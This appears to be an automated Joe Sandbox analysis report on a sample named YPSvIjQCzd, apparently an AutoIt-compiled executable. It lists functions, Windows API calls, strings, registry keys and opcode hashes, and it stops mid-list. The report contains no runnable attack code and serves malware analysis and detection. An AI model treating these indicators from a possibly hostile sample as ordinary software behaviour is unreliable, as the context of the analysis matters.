API String ID: 0-109567571
Opcode ID: 9c7b8776f280d0eb15ce5e5f0efaae5c4fcd8ea1c78466e5243a2cd385c1a6f6
Instruction ID: 638eaf15c6b3c687a45654066a217262f7391bc59064ca4ebd3bdac7efac58b3
Opcode Fuzzy Hash: 9c7b8776f280d0eb15ce5e5f0efaae5c4fcd8ea1c78466e5243a2cd385c1a6f6
Instruction Fuzzy Hash: 4AA27F74A04205CFCB25EF58C480AADB7B6FF58314F64806AE916AF351D739ED82CB91

Function 007E0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0BBB
timeGetTime.WINMM ref: 007E0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0FB3
TranslateMessage.USER32(?), ref: 007E0FC7
DispatchMessageW.USER32(?), ref: 007E0FD5
Sleep.KERNEL32(0000000A), ref: 007E0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 007E105A
DestroyWindow.USER32 ref: 007E1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E1080
Sleep.KERNEL32(0000000A,?,?), ref: 008152AD
TranslateMessage.USER32(?), ref: 0081608A
DispatchMessageW.USER32(?), ref: 00816098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008160AC

Strings

@GUI_WINHANDLE, xrefs: 008153B9
@TRAY_ID, xrefs: 00815BB9
@COM_EVENTOBJ, xrefs: 0081591A
@GUI_CTRLID, xrefs: 00815364
@GUI_CTRLHANDLE, xrefs: 0081540E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: cc40db2ff88380694936bbcda598d96a3a971fb0a8976fee725665767df0273d
Instruction ID: 20f8e8a44530ae96c0fc8e8ae4411ed3e540fb4870b264603b8d6d56daf6f448
Opcode Fuzzy Hash: cc40db2ff88380694936bbcda598d96a3a971fb0a8976fee725665767df0273d
Instruction Fuzzy Hash: 5AB2C370609741DFD724DF24C885BAAB7E9FF84304F14492EE58AD7291DB79E884CB82

Function 008393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008391E9: __time64.LIBCMT ref: 008391F3

Part of subcall function 007D5045: _fseek.LIBCMT ref: 007D505D

__wsplitpath.LIBCMT ref: 008394BE

Part of subcall function 007F432E: __wsplitpath_helper.LIBCMT ref: 007F436E

_wcscpy.LIBCMT ref: 008394D1
_wcscat.LIBCMT ref: 008394E4
__wsplitpath.LIBCMT ref: 00839509
_wcscat.LIBCMT ref: 0083951F
_wcscat.LIBCMT ref: 00839532

Part of subcall function 0083922F: _memmove.LIBCMT ref: 00839268
Part of subcall function 0083922F: _memmove.LIBCMT ref: 00839277

_wcscmp.LIBCMT ref: 00839479

Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AAE
Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008396DC
_wcsncpy.LIBCMT ref: 0083974F
DeleteFileW.KERNEL32(?,?), ref: 00839785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0083979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008397AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008397BE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b8ab2120d197736c66f1403b91e6808140c53482f57bbdce40201ad26a882e79
Instruction ID: 7f1dfa60ea206f3dc1e892d4526fd204b4512acd995ef10ab0c553627cf8056a
Opcode Fuzzy Hash: b8ab2120d197736c66f1403b91e6808140c53482f57bbdce40201ad26a882e79
Instruction Fuzzy Hash: A5C12DB190021DABDF11DF94CC85AEEB7BDFF94310F0040AAF649E6251EB749A448FA5

Function 007D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008962F8,?,007D37C0,?), ref: 007D4882

Part of subcall function 007F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007D72C5), ref: 007F0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0080ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0080ED32
RegCloseKey.ADVAPI32(?), ref: 0080ED70
_wcscat.LIBCMT ref: 0080EDC9

Strings

Include, xrefs: 0080ECE8, 0080ED29
\, xrefs: 0080EDEC
\Include\, xrefs: 007D72C5
Software\AutoIt v3\AutoIt, xrefs: 007D72FE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 903c71e2d308dc8e08a21ef318a14e9fd7b5a7a5f0e3a593a3b0a4545f36a741
Instruction ID: bdccf501adee1d848c3f6260d0e6b6e68582c8ad70ddbf440302164cd254b02b
Opcode Fuzzy Hash: 903c71e2d308dc8e08a21ef318a14e9fd7b5a7a5f0e3a593a3b0a4545f36a741
Instruction Fuzzy Hash: 10716A71528305DAC314EFA5DC858ABBBF8FF84350B48492FF546C32A1EB349948CB62

Function 007D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3A62
LoadCursorW.USER32(00000000,00007F00), ref: 007D3A71
LoadIconW.USER32(00000063), ref: 007D3A88
LoadIconW.USER32(000000A4), ref: 007D3A9A
LoadIconW.USER32(000000A2), ref: 007D3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AD2
RegisterClassExW.USER32(?), ref: 007D3B28

Part of subcall function 007D3041: GetSysColorBrush.USER32(0000000F), ref: 007D3074
Part of subcall function 007D3041: RegisterClassExW.USER32(00000030), ref: 007D309E
Part of subcall function 007D3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
Part of subcall function 007D3041: LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

0, xrefs: 007D3B06
#, xrefs: 007D3B0D
AutoIt v3, xrefs: 007D3B17

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 841884114aee5d8e9c1fbfb2297ee3c2c5e310e00207e608fd6d1687e3ebeb6c
Instruction ID: abe8cebe0e3f9710b1afc3cc2b70567f5b08676d7e0b9933019d41ba96c4349a
Opcode Fuzzy Hash: 841884114aee5d8e9c1fbfb2297ee3c2c5e310e00207e608fd6d1687e3ebeb6c
Instruction Fuzzy Hash: 04212B71900304AFEB10AFE4EC49B9D7FF5FB08711F04416BF604A62A1E3BA56649F94

Function 007D3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 007D38B9
/ErrorStdOut, xrefs: 007D388F
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007D37C0
CMDLINE, xrefs: 007D3834
CMDLINERAW, xrefs: 007D380D
/AutoIt3OutputDebug, xrefs: 007D38A4
/AutoIt3ExecuteScript, xrefs: 007D38CE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 75a4b4f771cab8b14acf1159f2bcf959efc0af39435e38d5ebda56c92dce458b
Instruction ID: d334d6745f99a5d678f8f9ae44e8d300a95bb2c679e5339679509d9befafe4b8
Opcode Fuzzy Hash: 75a4b4f771cab8b14acf1159f2bcf959efc0af39435e38d5ebda56c92dce458b
Instruction Fuzzy Hash: C1A13D7291022DDACB05EBE0CC99EEEB778FF14304F44052AE516B7291EB795A09CB61

Function 007D3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3074
RegisterClassExW.USER32(00000030), ref: 007D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

TaskbarCreated, xrefs: 007D30A4
+, xrefs: 007D305D
AutoIt v3 GUI, xrefs: 007D3090
0, xrefs: 007D3056

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 279fc5253c20ae8e204380bd1d1b86c8aa38836187858f5b153824aa88f1ede6
Instruction ID: 875b4565990cd548f64c005a0028531cb3329a8f1beb8f582766e4dd5e6ac6dd
Opcode Fuzzy Hash: 279fc5253c20ae8e204380bd1d1b86c8aa38836187858f5b153824aa88f1ede6
Instruction Fuzzy Hash: A93169B1805349AFDB00EFA4DC88AD9BFF0FB09311F18456AE690E62A1E3B90555CF51

Function 007D3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3074
RegisterClassExW.USER32(00000030), ref: 007D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

TaskbarCreated, xrefs: 007D30A4
+, xrefs: 007D305D
AutoIt v3 GUI, xrefs: 007D3090
0, xrefs: 007D3056

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: a2abde4e25201482c6ef0949ed98ab07342a38f66e0a6e87dcb68a97955992e0
Instruction ID: b3a2c645075c582de8bc85427256da6cb92c568e2c290f17527f8c0684cbb242
Opcode Fuzzy Hash: a2abde4e25201482c6ef0949ed98ab07342a38f66e0a6e87dcb68a97955992e0
Instruction Fuzzy Hash: 5B21C3B1911318AFDB00EFA4E889BDEBBF4FB08711F04412AFA11A62A1E7B54554CF91

Function 014F25E0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014F26B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014F28D7

Memory Dump Source

Source File: 00000001.00000002.1345357015.00000000014F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14f0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 3eb215065a22d517ef06d21d8a8f2411529b9189fab2d99149148fe2759a062f
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 97A1D774E00209EBDB14CFA4C954FAEBBB5BF48304F20815EE615BB391D7B59A41CB94

Function 007D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A36
ShowWindow.USER32(00000000,?,?), ref: 007D3A4A
ShowWindow.USER32(00000000,?,?), ref: 007D3A53

Strings

AutoIt v3, xrefs: 007D3A0D, 007D3A12, 007D3A13
edit, xrefs: 007D3A30

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e95ae8a52c66641a6aa3602f74880477043cd18b22bb77fed465d44cb64e9ed8
Instruction ID: 1859081076097a5c66c02cf55e2a5e65fda940c1b11720fe616b9807d97eb3bd
Opcode Fuzzy Hash: e95ae8a52c66641a6aa3602f74880477043cd18b22bb77fed465d44cb64e9ed8
Instruction Fuzzy Hash: BAF03A706002907EEA3127A36C08E273E7DF7CAF61F04002ABA00A21B1D2A91820CAB0

Function 014F23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 014F22A0: Sleep.KERNELBASE(000001F4), ref: 014F22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014F24CD

Strings

S3BHZIY1UKJ6DTUVS37LPNA1, xrefs: 014F2530, 014F2533

Memory Dump Source

Source File: 00000001.00000002.1345357015.00000000014F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14f0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateFileSleep
String ID: S3BHZIY1UKJ6DTUVS37LPNA1
API String ID: 2694422964-3650088209
Opcode ID: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
Instruction ID: d1a2d9addf60f22be2600dc79cd14f060486a8767ea70049562cbb2f1610c5b7
Opcode Fuzzy Hash: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
Instruction Fuzzy Hash: F9519330D04249DBEF11DBA4C818BEFBBB5AF15304F04419DE2097B2C1D6B95B49CBA6

Function 007D410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0080D5EC

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

_memset.LIBCMT ref: 007D418D
_wcscpy.LIBCMT ref: 007D41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D41F1

Strings

Line: , xrefs: 0080D615

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ab7f549f2f38e1181aa38899899682278a64ee5a878c0fee75da3e60b9141ce5
Instruction ID: 3d4d965461c528e71a5026fbe19295b74741d4ab0c037d23a33da858d69b6492
Opcode Fuzzy Hash: ab7f549f2f38e1181aa38899899682278a64ee5a878c0fee75da3e60b9141ce5
Instruction Fuzzy Hash: 41319E71008308ABD725EBA0DC4ABDA77F8BF44300F14461BB595922A1FB78AA58C796

Function 007F564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F56AB
_memcpy_s.LIBCMT ref: 007F571D
__read_nolock.LIBCMT ref: 007F577B
__filbuf.LIBCMT ref: 007F579E
_memset.LIBCMT ref: 007F57E2

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: b219aa6a1aa1462842ab94720c8373a32bc318a8684d5f63a7bc17543413be94
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 0151BE30A00B0DDBDB24AFA9C88467E77A1AF40720F248729FB35D63D0DB789D508B61

Function 007D69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 007D4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4F6F

_free.LIBCMT ref: 0080E68C
_free.LIBCMT ref: 0080E6D3

Part of subcall function 007D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6D0D

Strings

Bad directive syntax error, xrefs: 0080E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0080E462

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: a561488ed241bf5fa6536725126dce0e49a7a1002edde14656e23a3537b825c5
Instruction ID: 0220329d729193b713220b839f86bf86734d981a5c5fe7f77b0238cca1ffdc43
Opcode Fuzzy Hash: a561488ed241bf5fa6536725126dce0e49a7a1002edde14656e23a3537b825c5
Instruction Fuzzy Hash: 36918C71910619EFCF14EFA8CC959EEB7B4FF14314F14482AE811EB2A1EB34A904CB50

Function 007D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007D35A1,SwapMouseButtons,00000004,?), ref: 007D35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D35F5
RegCloseKey.KERNELBASE(00000000,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D3617

Strings

Control Panel\Mouse, xrefs: 007D35D2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
